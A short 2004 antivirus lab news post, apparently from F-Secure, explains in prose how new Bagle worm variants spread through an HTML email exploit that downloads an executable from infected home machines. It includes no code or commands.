NEWS FROM THE LAB - Thursday, March 18, 2004

A massmailer which doesn't mail itself Posted by Mikko @ 09:07 GMT

These new Bagles (by the way, one more variant was just found, named Bagle.S) are using a new technique to spread. They do not send themselves in email attachments like you would expect. Instead, they send emails which contain a HTML exploit.

When read, this HTML code will cause the recipients machine to download and run an executable from a web server...a web server which is installed to home machines infected by one of the previous Bagles. These worms contain lists of hundrerds of IP addresses which are running such a web server.

Most firewall programs would prevent running such a web server on a workstation (for example Windows XP's default firewall will do if it is activated). But the party behind Bagle seems to be only using machines which are not behind such firewalls.

As the HTML exploit runs automatically (on unpatched systems) when the email is read, users don't have to doubleclick anywhere to get infected - reading or previewing the email is enough.

Downloading the attachment from a website is not a totally new technique. In particular, an email worm called Fagled did this already in 2002. For more information, see https://www.f-secure.com/v-descs/fagled.shtml